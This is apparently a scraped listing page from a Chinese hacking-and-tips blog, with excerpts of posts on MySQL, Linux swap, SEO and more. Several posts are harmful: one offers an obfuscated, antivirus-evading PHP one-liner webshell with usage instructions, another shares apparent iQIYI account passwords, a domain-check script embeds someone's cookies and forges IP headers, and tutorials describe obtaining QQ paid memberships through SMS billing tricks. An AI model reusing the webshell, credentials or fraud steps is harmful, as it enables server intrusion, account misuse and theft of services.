• 什么是Tor?Tor浏览器更新有什么用?什么是Tor?Tor浏览器更新有什么用?
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开
  • 中华人民共和国网络安全法中华人民共和国网络安全法
大横幅1
大横幅2
到期时间:永久 到期时间:推广
到期时间:推广 小横幅4
今日发布0篇文章 | 本站共发布了2049篇文章
  • 爱奇艺会员账号分享

     我们保证分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:1021569037 密码:p4wE9VnFp4gx 账号:1321569038 密码:R9583wHEYnWAPFG 账号:668156903 密码:rYibpWqrQS 账号:9111569040 密码:ivjCJRG 账号:4391569033998 密码:1BFcSbAhR9 账号:30515690418 密码:2D8fVJMmQRP2 账号:827156903 密码:rjITvmLa 账号:49515690361 密码:L8zxcuK7mO 账号:71915690 密码:wi7Idj4tw3TnF 温馨提示:给大家分享这么多账号,也希望大家能够向你的朋友分享本站,浏览器搜索【Kirin博客】 ...

    2019-09-14 849
  • mysql的基本用法

    安装 rpm安装 yum install -y mysql-server mysql-devel 启动服务 1.service mysqld start #启动服务 2.service mysqld stop #关闭服务 3.service mysqld restart #重启服务 4.chkconfig mysqld on #设置开机启动 常用操作 mysql客户端命令 mysql -u #用户名 -p #密码 -h #主机 -p #协议(根据tcp, socket, pile等) 更改用户密码 mysqladmin实现 1.mysqladmin -uroot password 'newpassword' -p 或 2.mysqladmin -u root -h hostname password 'newpassword' 修改数据库实现 1. mysql>use mysql; mysql>update user set password = password('newpassword') where user = 'root'; mysql>flush privileges; 2. mysql>set password for 'root@host_name' = password('newpassword'); mysql>update mysql.user set password = password('newpassword') where condition; mysql>flush privileges; 服务端常用命令 交互模式(通过mysql -uroot -p进入) mysql>show databases; #列出所有数据库 mysql>shwo tables; #查看所有表 mysql>show engines; #查看引擎信息 mysql>show character set; #查看字符集 mysql>use DB_NAME; #切换当前数据库 查看数据库当前有访问权限的信息 mysql>use mysql; mysql>select User, Password, Host FROM user; 允许用户远程登陆 mysql>use mysql; mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; mysql>flush privileges; #其中"*.*"代表所有资源所有权限, “'root'@%”其中root代表账户名,%代表所有的访问地址, #也可以使用一个唯一的地址进行替换,只有一个地址能够访问。如果是某个网段的可以使用地址 #与%结合的方式,如10.0.42.%。IDENTIFIED BY 'root',这个root是指访问密码。WITH GRANT OPTION允许级联授权。 删除历史输入的命令 root@localhost# head ~/.mysql_history root@localhost# >~/.mysql_history 批处理模式(用于将表导入数据库) mysql < *.sql 数据库的备份 root@localhost# mysqldump -uroot -p password [DB_NAME] > [DUMP_FILE] #备份指定数据库 root@localhost# mysqldump --no-data --databases mydatabases1 mydatabases2 mydatabases3 > test.dump #只备份表结构 root@localhost# mysqldump --all-databases > [DUMP_FILE] #备份所有数据库 忘记root密码 #跳过访问控制权限进入mysql #编辑 /etc/my.cnf,添加一行:skip-grant-table [mysqld] skip-frant-table #重启mysqld service mysqld restart #修改密码 root@localhost# mysql mysql>use mysql mysql>update mysql.user set password = password('newpassword') where user = 'root' and host = 'localhost'; mysql>flush privileges; mysql>exit #编辑/etc/my.cnf文件 删除skip-grant-table #重启服务 service mysqld restart 创建用户 #登陆mysql mysql -uroot -p密码 #创建用户 mysql> insert into mysql.user(Host,User,Password) values("localhost","test",password("1234")); #创建了一个test用户 密码为1234 且只能本地登陆如果要远程登陆把"localhost"改为"%"。 mysql>flush privileges; 删除用户 #登陆mysql mysql -uroot -p密码 #删除用户 mysql>Delete FROM user Where User='test' and Host='localhost'; mysql>flush privileges; mysql>drop database testDB; #删除用户的数据库 #删除账户及权限 mysql>drop user 用户名@'%'; mysql>drop user 用户名@ localhost; 删除数据库和数据表 mysql>drop database 数据库名; mysql>drop table 数据表名; 导入导出.sql文件的方法 #导出数据和表结构: mysqldump -u用户名 -p密码 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p abc > abc.sql #只导出表结构 mysqldump -u用户名 -p密码 -d 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p -d abc > abc.sql #导入数据库 1.建立空数据库 mysql>create database abc; 2.导入数据库 1).选择数据库 mysql>use abc; 2).设置数据库编码 mysql>set names utf8; 3).导入数据库(注意sql文件路径) mysql>source /root/abc.sql...

    2019-09-13 922
  • Win10任务管理器监控系统在桌面上显示

    让Win10实时监控任务管理器在桌面上面显示或置顶在最前面让你时时刻刻了解你的电脑资源占用率,还可以在玩游戏时测测是否资源率占用大,还有各种姿势使用,自己折腾吧。 打开任务管理器,键盘快捷键:CTRL+SHIFT+ESC,默认显示是下图一样的打开性能然后双击CPU那里。 双击就变成这种简洁窗口了,再次双击就还原,其它功能自己尝试吧! ...

    2019-09-13 1062
  • 最新webshell免杀php一句话变种

    前言       2019年9月9日最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> 说明 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码...

    2019-09-13 1629
  • PHP腾讯域名拦截检测接口源码

    <?php header('Access-Control-Allow-Origin:*'); header('Content-type:application/json; charset=utf-8'); error_reporting(0); !empty($_GET['url']) ? $url = $_GET['url'] : exit(json_encode([ 'code'=>-1, "msg"=>"请输入网址" ],JSON_UNESCAPED_UNICODE)); $json = jsonp_decode(Curl_GET("https://cgi.urlsec.qq.com/index.php?m=check&a=check&callback=jQuery11.306943167371763181_15671.3944271&url={$url}&_=".msectime())); if ($json->reCode!==0){ $arr=[ "code"=>-1, "msg"=>$json->data, ]; }else{ $type = $json->data->results->whitetype; $urls = $json->data->results->url; if ($type==1 || $type==3){ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"正常" ]; }else{ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"拦截" ]; } } exit(json_encode($arr,JSON_UNESCAPED_UNICODE)); /** * @return string * Curl GET */ function Curl_GET($url){ $ch = curl_init(); // Curl 初始化 $header = [ 'X-FORWARDED-FOR:218.91.92.84', 'CLIENT-IP:218.91.92.84', 'Cookie: pgv_pvi=9897416704; RK=WI7w5+CMZn; ptcz=e383433090496e1f60381fd68733196426868ba1876249a6736bcc4a3eb8ec72; pgv_pvid=455855220; cid=89410138-a33a-4ea9-98f2-4436da89d67d; _tfpdata=yBRknXvS8CfrED0zD85NZfxCPzT5SW8KEY03rIziZmu9ogk9y%2B5%2FU4QrJBbfqfuVqr%2F6vw8nSWfqHR3fu2Jc0TPvszwmrMwXEdN%2B8bKKfHwNCcL%2F2%2Fbhmiu%2B%2F4IgK1DX' ]; curl_setopt($ch, CURLOPT_URL, $url); // 设置 Curl 目标 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Curl 请求有返回的值 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); // 设置抓取超时时间 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 跟踪重定向 curl_setopt($ch, CURLOPT_ENCODING, ""); // 设置编码 curl_setopt($ch, CURLOPT_REFERER, $url); // 伪造来源网址 curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //伪造IP curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"); // 伪造ua curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); // 取消gzip压缩 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $content = curl_exec($ch); curl_close($ch); // 结束 Curl return $content; // 函数返回内容 } /** * 返回当前毫秒 */ function msectime() { list($msec, $sec) = explode(' ', microtime()); return (float)sprintf('%.0f', (floatval($msec) + floatval($sec)) * 1000); } /** * @param $jsonp * @param bool $assoc * @return mixed * jsonp转对象 */ function jsonp_decode($jsonp, $assoc = false) { $jsonp = trim($jsonp); if(isset($jsonp[0]) && $jsonp[0] !== '[' && $jsonp[0] !== '{') { $begin = strpos($jsonp, '('); if(false !== $begin) { $end = strrpos($jsonp, ')'); if(false !== $end) { $jsonp = substr($jsonp, $begin + 1, $end - $begin - 1); } } } return json_decode($jsonp, $assoc); } ...

    2019-09-13 1424
  • PHP自动Get监控源码分享

    程序简介 创建个PHP文件放到你的网站根目录里面,访问后不会出现结果,等待个20秒左右关闭页面,就会自动执行了。 如果不重启php服务器 或者重启服务器,get监控一直会处于运行状态。 测试了一下秒赞网的监控,效果还是很不错的。 程序代码 <?php //设置脚本运行不超时 set_time_limit(0); //即使浏览器关闭还继续运营 ignore_user_abort(true); //睡眠5秒 sleep(5); //要监控的网址 $cronurl = 'https://www.baidu.com/'; //开始get监控 httpGet($cronurl); //这里还可以无限添加httpGet("网址"); //获取当前文件的访问url $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; //开始get运行,达到无限循环的效果 httpGet($url); //发起GET模拟请求 function httpGet($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept-Encoding: gzip, deflate')); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 3); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $output = curl_exec($ch); curl_close($ch); return $output; } ...

    2019-09-13 960
  • 拥有一副好身材是怎样的体验?

    知乎上关于身材好的讨论层出不穷,备好营养快线在看 拥有一副令人羡慕的好身材是怎样的体验? 地址:https://www.zhihu.com/question/297715922/answer/730392675 身材丰满型的女生穿旗袍不好看吗? 地址:https://www.zhihu.com/question/293990901/answer/728222816 有个身材火辣的女朋友是怎样一种体验? 地址:https://www.zhihu.com/question/313825759/answer/633963251 女生拥有一双大长腿是什么样体验? 地址:https://www.zhihu.com/question/266669308/answer/386636616 为啥现在腿控那么多? 地址:https://www.zhihu.com/question/305040147/answer/575079312 ...

    2019-09-06 848
  • QQ扩列宣言女生可爱撩人签名 我这个该死的漂亮女孩

    导读:你骂我,我吃亏,你就是个小乌龟今天要完成的任务是,想你,爱你,夸你。抬头要挺胸,走路要带风。我这个该死的漂亮女孩。你的眼睛真漂亮里面只适合装我你过来我有个天想跟你聊一下算命的说我旺夫你要不要验证一下说 你骂我,我吃亏,你就是个小乌龟 今天要完成的任务是,想你,爱你,夸你。 抬头要挺胸,走路要带风。 我这个该死的漂亮女孩。 你的眼睛真漂亮里面只适合装我 你过来 我有个天想跟你聊一下 算命的说我旺夫你要不要验证一下 说了晚安就不准再和别的小朋友聊天了哦。 猪圈空荡荡,而你在人间。 抱着小熊一天天长大 糖果也一天天甜. 都怪这个世界上女孩子太多了 我都不宝贝了 你好,我叫对象,真名老婆,小名女神,外号宝贝,喜欢哪个就叫我哪个。 女生污起来,男生用十个闪现都追不上。 我妈说等我长大了,就把我嫁给你。 你现在在哪儿 在家 你现在在我的脑海里 你知道我喜欢什么季节吗 不知道 我喜欢有你的季节 染最艳的头发 留最深的疤 只为寻找最爱的她 我想你一定很忙,所以你只看前三个字就好。 想打你一顿,也想抱抱你,想问你怎么还不来找我,我难过的都要发芽了。 遇见这么可爱的我,难道不是这世间最好的礼物吗? 我有一点点甜 一点点可爱 还有很多很多喜欢你. 没时间跟你斤斤计较,我还要忙着可爱。 希望你以后,有酒有肉有姑娘,姑娘丑的不像样。 我曾经是少女 现在是美少女. 世间的五味俱全 只想要一个人给的甜. 冬天啊 女孩子白白嫩嫩的手就应该放在喜欢的人口袋里. 见什么世面 见见你就好啦 小鱼干是我的 你也是我的 要记住每一个对你好的人,因为他们本可以不这么做的。 都说爱笑的人智商高那我岂不是智商爆表了. 你是个好男孩,可是我太漂亮了,你配不上。 现在的我很自在,皆因没有恋爱。 别拍了,我就是这儿最沙最甜的西瓜。 小时候被不吐西瓜子吓的半死的,长大就知道自己多蠢了吧。 ...

    2019-08-29 888
  • 腾讯BUG免费换挂件

    无需开通会员点击即可直接设置挂件 已亲测! 地址:http://t.cn/Ai83eWSH...

    2019-08-29 899
  • 王者荣耀体验服

    王者荣耀体验服最新一期资格申请活动 开放时间8月27日15点开启抢号功能! 地址:http://t.cn/Ai8fLbQI...

    2019-08-27 1241
  • 干货|Python渗透测试工具库

    漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 : Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com/SkyLined/LocalNetworkScanner 子域名扫描器: https://github.com/lijiejie/subDomainsBrute https://github.com/aboul3la/Sublist3r https://github.com/TheRook/subbrute https://github.com/infosec-au/altdns linux漏洞扫描: https://github.com/future-architect/vuls 基于端口扫描以及关联CVE: https://github.com/m0nad/HellRaiser 漏洞路由扫描器: https://github.com/jh00nbr/Routerhunter-2.0 迷你批量信息泄漏扫描脚本: https://github.com/lijiejie/BBScan Waf类型检测工具: https://github.com/EnableSecurity/wafw00f 服务器端口弱口令扫描器: https://github.com/wilson9x1/fenghuangscanner_v3 Fox-scan扫描器: https://github.com/fengxuangit/Fox-scan/ 信息搜集工具 : 社工收集器: https://github.com/n0tr00t/Sreg Github信息搜集: https://github.com/sea-god/gitscan github Repo信息搜集工具: https://github.com/metac0rtex/GitHarvester 信息探测及扫描工具: https://github.com/darryllane/Bluto 内部网络信息扫描器: https://github.com/sowish/LNScan 远程桌面登录扫描器: https://github.com/linuz/Sticky-Keys-Slayer 网络基础设施渗透工具 https://github.com/SECFORCE/sparta SNMAP密码破解: https://github.com/SECFORCE/SNMP-Brute WEB: webshell大合集: https://github.com/tennc/webshell 渗透以及web攻击脚本: https://github.com/brianwrf/hackUtils web渗透小工具大合集: https://github.com/rootphantomer/hacktoolsfor_me XSS数据接收平台: https://github.com/firesunCN/BlueLotus_X55Receiver XSS与CSRF工具: https://github.com/evilcos/xssor xss多功能扫描器: https://github.com/shawarkhanethicalhacker/BruteXSS web漏洞扫描器: https://github.com/andresriancho/w3af WEB漏洞扫描器: https://github.com/sullo/nikto 渗透常用小工具包: https://github.com/leonteale/pentestpackage web目录扫描器: https://github.com/maurosoria/dirsearch web向命令注入检测工具: https://github.com/stasinopoulos/commix 自动化SQL注入检查工具: https://github.com/epinna/tplmap SSL扫描器: https://github.com/rbsec/sslscan 安全工具集合: https://github.com/codejanus/ToolSuite apache日志分析器: https://github.com/mthbernardes/ARTLAS php代码审计工具: https://github.com/pwnsdx/BadCode web指纹识别扫描: https://github.com/urbanadventurer/whatweb 检查网站恶意攻击: https://github.com/ciscocsirt/malspider wordprees漏洞扫描器: https://github.com/wpscanteam/wpscan 固件漏洞扫描器: https://github.com/misterch0c/firminator_backend 数据库注入工具 https://github.com/sqlmapproject/sqlmap Web代理: https://github.com/zt2/sqli-hunter 新版中国菜刀: https://github.com/Chora10/Cknife git泄露利用EXP: https://github.com/lijiejie/GitHack 浏览器攻击框架: https://github.com/beefproject/beef 自动化绕过WAF脚本: https://github.com/khalilbijjou/WAFNinja https://github.com/owtf/wafbypasser 一款开源WAF: https://github.com/SpiderLabs/ModSecurity http命令行客户端: https://github.com/jkbrzt/httpie 浏览器调试利器: https://github.com/firebug/firebug DISCUZ漏洞扫描器: https://github.com/code-scan/dzscan 自动化代码审计工具 https://github.com/wufeifei/cobra 浏览器攻击框架: https://github.com/julienbedard/browsersploit tomcat自动后门部署: https://github.com/mgeeky/tomcatWarDeployer 网络空间指纹扫描器: https://github.com/nanshihui/Scan-T burpsuit之J2EE扫描插件: https://github.com/ilmila/J2EEScan windows域渗透工具: mimikatz明文注入: https://github.com/gentilkiwi/mimikatz Powershell渗透库合集: https://github.com/PowerShellMafia/PowerSploit Powershell tools合集: https://github.com/clymb3r/PowerShell powershell的mimikittenz: https://github.com/putterpanda/mimikittenz 域渗透教程: https://github.com/l3m0n/pentest_study Fuzz: Web向Fuzz工具 https://github.com/xmendez/wfuzz HTTP暴力破解,撞库攻击脚本 https://github.com/lijiejie/htpwdScan 漏洞利用及攻击框架: msf框架: https://github.com/rapid7/metasploit-framework pocsscan攻击框架: https://github.com/erevus-cn/pocscan Pocsuite攻击框架: https://github.com/knownsec/Pocsuite Beebeeto攻击框架: https://github.com/n0tr00t/Beebeeto-framework 漏洞POC&EXP: ExploitDB官方git版本: https://github.com/offensive-security/exploit-database php漏洞代码分析: https://github.com/80vul/phpcodz CVE-2016-2107: https://github.com/FiloSottile/CVE-2016-2107 CVE-2015-7547 POC: https://github.com/fjserna/CVE-2015-7547 JAVA反序列化POC生成工具: https://github.com/frohoff/ysoserial JAVA反序列化EXP: https://github.com/foxglovesec/JavaUnserializeExploits Jenkins CommonCollections EXP: https://github.com/CaledoniaProject/jenkins-cli-exploit CVE-2015-2426 EXP (windows内核提权): https://github.com/vlad902/hacking-team-windows-kernel-lpe use docker to show web attack(php本地文件包含结合phpinfo getshell 以及55Rf结合curl的利用演示): https://github.com/hxer/vulnapp php7缓存覆写漏洞Demo及相关工具: https://github.com/GoSecure/php7-opcache-override XcodeGhost木马样本: https://github.com/XcodeGhostSource/XcodeGhost 中间人攻击及钓鱼 中间人攻击框架: https://github.com/secretsquirrel/the-backdoor-factory https://github.com/secretsquirrel/BDFProxy https://github.com/byt3bl33d3r/MITMf Inject code, jam wifi, and spy on wifi users: https://github.com/DanMcInerney/LANs.py 中间人代理工具: https://github.com/intrepidusgroup/mallory wifi钓鱼: https://github.com/sophron/wifiphisher 密码破解: 密码破解工具: https://github.com/shinnok/johnny 本地存储的各类密码提取利器: https://github.com/AlessandroZ/LaZagne 二进制及代码分析工具: 二进制分析工具 https://github.com/devttys0/binwalk 系统扫描器 https://github.com/quarkslab/binmap rp: https://github.com/0vercl0k/rp Windows Exploit Development工具 https://github.com/lillypad/badger 二进制静态分析工具(python): https://github.com/bdcht/amoco Python Exploit Development Assistance for GDB: https://github.com/longld/peda 对BillGates Linux Botnet系木马活动的监控工具 https://github.com/ValdikSS/billgates-botnet-tracker 木马配置参数提取工具: https://github.com/kevthehermit/RATDecoders Shellphish编写的二进制分析工具(CTF向): https://github.com/angr/angr 针对python的静态代码分析工具: https://github.com/yinwang0/pysonar2 一个自动化的脚本(shell)分析工具,用来给出警告和建议: https://github.com/koalaman/shellcheck 基于AST变换的简易Javascript反混淆辅助工具: https://github.com/ChiChou/etacsufbo EXP编写框架及工具: 二进制EXP编写工具: https://github.com/t00sh/rop-tool CTF Pwn 类题目脚本编写框架: https://github.com/Gallopsled/pwntools an easy-to-use io library for pwning development: https://github.com/zTrix/zio 跨平台注入工具: https://github.com/frida/frida 哈希长度扩展攻击EXP: https://github.com/citronneur/rdpy 隐写: 隐写检测工具 https://github.com/abeluck/stegdetect 各类安全资料: data_hacking合集: https://github.com/ClickSecurity/data_hacking mobile-security-wiki: https://github.com/exploitprotocol/mobile-security-wiki 书籍《reverse-engineering-for-beginners》: https://github.com/veficos/reverse-engineering-for-beginners 一些信息安全标准及设备配置: https://github.com/luyg24/IT_security APT相关笔记: https://github.com/kbandla/APTnotes Kcon资料: https://github.com/knownsec/KCon 《DO NOT FUCK WITH A HACKER》: https://github.com/citypw/DNFWAH 各类安全脑洞图: https://github.com/phith0n/Mind-Map 信息安全流程图: https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428 各类CTF资源 近年ctf writeup大全: https://github.com/ctfs/write-ups-2016 https://github.com/ctfs/write-ups-2015 https://github.com/ctfs/write-ups-2014 fbctf竞赛平台Demo: https://github.com/facebook/fbctf ctf Resources: https://github.com/ctfs/resources ctf及黑客资源合集: https://github.com/bt3gl/My-Gray-Hacker-Resources ctf和安全工具大合集: https://github.com/zardus/ctf-tools ctf向 python工具包 https://github.com/P1kachu/v0lt 各类编程资源: 大礼包(什么都有): https://github.com/bayandin/awesome-awesomeness bash-handbook: https://github.com/denysdovhan/bash-handbook python资源大全: https://github.com/jobbole/awesome-python-cn git学习资料: https://github.com/xirong/my-git 安卓开源代码解析 https://github.com/android-cn/android-open-project python框架,库,资源大合集: https://github.com/vinta/awesome-python JS 正则表达式库(用于简化构造复杂的JS正则表达式): https://github.com/VerbalExpressions/JSVerbalExpressions Python: python 正则表达式库(用于简化构造复杂的python正则表达式): https://github.com/VerbalExpressions/ python任务管理以及命令执行库: https://github.com/pyinvoke/invoke python exe打包库: https://github.com/pyinstaller/pyinstaller Veil-Evasion免杀项目: https://github.com/Veil-Framework/Veil-Evasion py3 爬虫框架: https://github.com/orf/cyborg 一个提供底层接口数据包编程和网络协议支持的python库: https://github.com/CoreSecurity/impacket python requests 库: https://github.com/kennethreitz/requests python 实用工具合集: https://github.com/mahmoud/boltons python爬虫系统: https://github.com/binux/pyspider 科学上网: 科学上网工具 https://github.com/XX-net/XX-Net 福利: 微信自动抢红包动态库 https://github.com/east520/AutoGetRedEnv 微信抢红包插件(安卓版) https://github.com/geeeeeeeeek/WeChatLuckyMoney hardsed神器: https://github.com/yangyangwithgnu/hardseed 甲方安全工程师生存指南 web索引及日志搜索工具: https://github.com/thomaspatzke/WASE 开源日志采集器: https://github.com/wgliang/logcool 扫描CS结构的web debuger https://github.com/Kozea/wdb 恢复sqlite数据库删除注册信息: https://github.com/aramosf/recoversqlite/ gps欺骗检测工具: https://github.com/zxsecurity/gpsnitch 应急处置响应框架: https://github.com/biggiesmallsAG/nightHawkResponse web安全开发指南: https://github.com/FallibleInc/security-guide-for-developers 各个知名厂商漏洞测试报告模板: https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包: https://github.com/rfxn/linux-malware-detect 操作系统运行指标可视化框架: https://github.com/facebook/osquery 恶意代码分析系统: https://github.com/cuckoosandbox/cuckoo 定期搜索及存储web应用: https://github.com/Netflix/Scumblr 事件响应框架: https://github.com/google/grr 综合主机监控检测平台: https://github.com/ossec/ossec-hids 分布式实时数字取证系统: https://github.com/mozilla/mig Microsoft & Unix 文件系统及硬盘取证工具: https://github.com/sleuthkit/sleuthkit 蜜罐: SSH蜜罐: https://github.com/desaster/kippo 蜜罐集合资源: https://github.com/paralax/awesome-honeypots kippo进阶版蜜罐: https://github.com/micheloosterhof/cowrie SMTP 蜜罐: https://github.com/awhitehatter/mailoney web应用程序蜜罐: https://github.com/mushorg/glastopf 数据库蜜罐: https://github.com/jordan-wright/elastichoney web蜜罐: https://github.com/atiger77/Dionaea 远控: 用gmail充当C&C服务器的后门 https://github.com/byt3bl33d3r/gcat 开源的远控: https://github.com/UbbeLoL/uRAT c#远控: https://github.com/hussein-aitlahcen/BlackHole ...

    2019-08-26 1034
  • 利用代码百分百QQ封号7天

      这个方法只能冻结发送文字的QQ 不能冻结接收信息的QQ  发送成功后 会直接冻结7天QQ账号 并且只能等自动解冻  封号的文本已经打包了,需要的加群下载,切记别用大号做实验 请勿复制这段文字在QQ里发送 会自动冻结7天QQ号码~ ——————思路自己想,套路深就好了谁套路深谁赢—————— 此代码仅娱乐非法,用途与我无关   ...

    2019-08-26 16763
  • 免费撸腾讯钻方法

    话不多说,给你思路,自行领悟。 成功的老铁可以来评论一下。...

    2019-08-25 1160
  • centos7添加虚拟内存[SWAP]

    1.查看内存使用 查看在未增加swap之前虚拟内存的使用情况 free -m Shell  复制 2.创建 swap 文件 使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 Shell  复制 文件越大,创建的时间越厂 3.转换为 swap 格式 将文件格式转换为 swap 格式的 mkswap /home/swap Shell  复制 4.挂载swap分区 再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap Shell  复制 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested.  修改权限: chmod 600 /home/swap 5.再次查看内存使用 注意观察和1中变化。 free -m Shell  复制 6.设置重启依然有效 为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 0 Shell  复制 7.停用虚拟内存 swapoff -v /home/swap Shell  复制 ...

    2019-08-25 1324
  • 两毛钱开SVIP 理论永久 联通卡

    两毛钱开SVIP 理论永久 联通卡 超会:kt3#自己的QQ号发送10661700 普会:kt4#自己的QQ号发送10661700 秒开 开完回复0000到10010 无定制业务 不确定下个月是否扣费 上海联通已测试成功1普会+1超会 其它地区自测  操作图下面 ...

    2019-08-24 1463
  • 网站被K了,要怎么解决。

    想解决网站被K这个问题的重中之重点就是:找到问题,并进行针对性的解决! 案例: 1、因服务器不稳定,长期登不上导致整站被K这种情况的,我们首先应该把服务器稳定了,不会的话,可以联系空间商售后客服。然后继续正常优化,提交优质内容,等待蜘蛛正常抓取就OK。 2、因群发、群建被K这种的话就是因为网站垃圾内容太多,如果想只是删除网站垃圾内容的话,是不太现实的。所以就快速的方法就是更换域名或者清除网站内容重新做,提交网站等待网站正常抓取。 3、因涉及违法内容被K 首先提交闭站保护,然后清除站内违法信息内容,三天后提交网站,等待蜘蛛正常抓取。 如果连原因都不知道,那你再怎么解决也是牛头不对马嘴,做一些无用功,除非你真的是“天选之子”。 最后给大家分享一个终极杀招,进行被K原因针对性解决后,换十个左右适合自己网站的优质友链,然后就可以观察网站的变化,等待网站恢复了。...

    2019-08-21 988
  • 2019刷QQ超级会员代码教程

    很高兴你能看到这篇教程,今天我教你一个关于刷钻的永久教程 我从2016年开始对刷钻还是挺感兴趣的,就在昨天我想用手机给我的一个QQ小号开个会员,然后我习惯性的又把它退了 一直到今天9号15点20分还没有回收,然后我深度的研究了一下,分享给了我朋友(他们都成功了)所以(好东西大家分享嘛) 需要的工具:手机  手机卡  代码(开通代码) 例:(超级会员) 1.打开手机QQ 2.个人资料 3.打开超级会员开通页面 4.选择手机支付 5.输入手机号码 6.获取验证码 (输入验证码 - 点击开通) 7.打开手机短信 8.0000到10086 - 10000 - 10010(回复一遍 第9步 - 按数字退定业务 - 然后在回复第9步) 9.编辑内容(##%%*到退定页面) 10.恭喜你成功了! 下面我讲一下代码钻 手机的开放时间为一个月,但官方网站上找不到截止日期  你可以去腾讯客服网查一下 1.发送50至10665999个成员  (这称为55个成员) 2.收到订单信息   (这是给55名成员的) 3.发送总部到10661700  (这被称为总部成员) 4.还收到一条短信  (总部成员的订单短信) 5.然后我们会回复两个订单信息  (不发送,保存草稿应该是让你回复是或1具体看看信息的内容) 6.编辑00000至10661 700编辑00000至106659999  (总共有两条短信) 7.用你1 8岁的单手速度发送四条短信。务必先发送订单,然后发送00000  (即取消订单) 8.然后,您将收到两条绑定消息来绑定您的QQ 9.恭喜你又成功了! 运营商:移动 电信 联通(湖南) 移动 电信(浙江) 亲测地址: 湖南长沙-怀化   浙江宁波   这个三个城市亲测成功 其他地区和运营商自己测试-因为我没有各大地区的卡 短信取消法代码: 会员发送VIP到106617009777 红钻发送QQF到106617009777 黄钻发送QQH到106617009777 蓝钻发送QQY到106617009777 绿钻发送AD到106617009777 超级QQ发送HQ到106617009777 点播法代码: 超Q MQ#QQ号码发送到1065889900 黄钻:HZ#QQ号码发送到1065889900 蓝钻:LZ#QQ号码发送到1065889900 绿钻:LZ#QQ号码发送到106580777 图书:YD#QQ号码发送到106580777 绿钻:MU#QQ号发送到106588993655 魔钻:MZ#QQ号码发送到1065889900 会员:HY#QQ号码发送到1065889900 红钻:SH#QQ号码发送到106588993655 超级会员:HYVIP#QQ发送到106588993655 蓝钻豪华版:LZVIP#QQ发送到106588993655 绿钻豪华版:MUVIP#QQ发送到106588993655 黄钻豪华版:HZVIP#QQ发送到106588993655 腾讯好莱坞:FL#QQ发送到106588993655 体育会员:SP#QQ发送到106588993655 ...

    2019-08-17 3298
  • 涪陵榨菜给台湾专家寄榨菜

